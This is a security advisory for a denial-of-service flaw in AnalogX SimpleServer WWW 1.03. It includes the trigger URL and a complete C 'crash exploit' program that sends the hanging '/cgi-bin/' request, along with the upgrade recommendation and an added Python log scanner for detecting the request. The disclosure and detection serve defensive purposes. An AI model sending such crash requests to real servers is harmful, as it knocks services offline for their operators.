Security Vulnerability
AnalogX SimpleServer WWW 1.03 is vulnerable to a denial-of-service attack

Published: 2000-03-31
Updated: 2000-03-31

Affected systems:
AnalogX SimpleServer:WWW 1.0.3
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
Unaffected systems:
AnalogX SimpleServer:WWW 1.0.4
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
Description:

If a URL consists of "/cgi-bin/" followed by an 8-character string (for a total URL
length of 17 characters), sending a request for that URL to the AnalogX SimpleServer
WWW 1.03 web server causes the SimpleServer server to stop responding.


<* Source: Presto Chango <presto@regiononline.com> *>


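Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

http://target/cgi-bin/<any 8-character string>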


/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>


int main(int argc, char *argv[])
{
  int sock;
  struct sockaddr_in sin;
  struct hostent *he;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,foreign=0;
  ssize_t n;
  char ojsimp[20];
  char *okay[2];
  char *player[2];


  /* Only index 1 is used: "/cgi-bin/" followed by an 8-character name. */
  okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
  player[1] = "Check if its running now.";


  if (argc<2)
  {
    printf("\n HOSTNAME PLEASE@!# ");
    exit(0);
  }
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
  printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n");
  sock=socket(AF_INET, SOCK_STREAM, 0);
  memset(&sin, 0, sizeof(sin));
  bcopy(he->h_addr_list[0], (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);


  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
    exit(1);
  }
  /* Print the server banner first. */
  printf("\n\n HTTPD Version. \n");
  getchar();
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  n = recv(sock, buffer, sizeof(buffer)-1,0);
  if (n < 0) n = 0;
  buffer[n] = '\0';   /* terminate before printing as a string */
  printf("%s",buffer);
  close(sock);
  printf("\n\t Press something. \n");
  getchar();
  /* One pass only: okay[1] and player[1] are the only entries set. */
  while(count++ < 1)
  {
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr_list[0], (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
      perror("connect");
      exit(1);
    }


    printf(" %s : ",player[count]);
    for(numin=0;numin < 20;numin++)
    {
      ojsimp[numin] = '\0';
    }
    send(sock, okay[count],strlen(okay[count]),0);
    /* Leave the last byte as the terminator for strstr(). */
    recv(sock, ojsimp, sizeof(ojsimp)-1,0);
    cgistr = strstr(ojsimp,foundmsg);


    if( cgistr != NULL)
    {
      printf("Heh.\n");++foreign;
    }
    else printf(" tPG\n");


    close(sock);
  }
  if (foreign)
  {
    printf("bl3h. bl4h. h3h. w00p. 33p.\n");
  }
  return 0;
}



Recommendation:

AnalogX has released SimpleServer:WWW 1.0.4, which fixes this problem. Upgrading to the
new version as soon as possible is recommended:

http://www.analogx.com/files/sswwwi.exe
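
For hosts that cannot be upgraded immediately, the request shape given in the description can be searched for in request logs. The following is an added example, not part of the original advisory: it assumes Common Log Format entries from a proxy or sensor in front of the server, the names `is_trigger` and `scan` are illustrative, and the sample log is constructed. It compares the raw request target only; the advisory does not say whether other forms of the URL have the same effect.

```python
import re
from collections import Counter

# Request line in Common Log Format (assumed; adapt to your proxy or sensor).
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
PREFIX = "/cgi-bin/"
TRIGGER_LEN = 17  # 9-character prefix + 8-character name, per the advisory


def is_trigger(target):
    """True when the raw request target has the shape the advisory describes."""
    return target.startswith(PREFIX) and len(target) == TRIGGER_LEN


def scan(lines):
    """Return (hits, per_source): matching entries and a count per client."""
    hits, per_source = [], Counter()
    for line in lines:
        m = CLF.match(line)
        if not m:  # skip anything that is not a log entry
            continue
        if is_trigger(m["target"]):
            hits.append((m["ts"], m["src"], m["target"], m["status"]))
            per_source[m["src"]] += 1
    return hits, per_source


# Constructed sample log (documentation address ranges, invented entries).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Mar/2000:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [31/Mar/2000:10:01:05 +0000] "GET /cgi-bin/search.cgi HTTP/1.0" 404 210',
    '198.51.100.7 - - [31/Mar/2000:10:02:11 +0000] "GET /cgi-bin/tpgnrock HTTP/1.0" 504 0',
    '203.0.113.5 - - [31/Mar/2000:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 504 0',
    'this line is not a log entry',
]

if __name__ == "__main__":
    hits, per_source = scan(SAMPLE_LOG)
    for ts, src, target, status in hits:
        print(f"{ts} {src} {target} status={status}")
    for src, count in per_source.most_common():
        print(f"{src}: {count} matching request(s)")
```

Ordinary 8-character script names such as `test.cgi` match as well as the string used in the test program, so a hit is a lead to correlate with server availability rather than proof of intent.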

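This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.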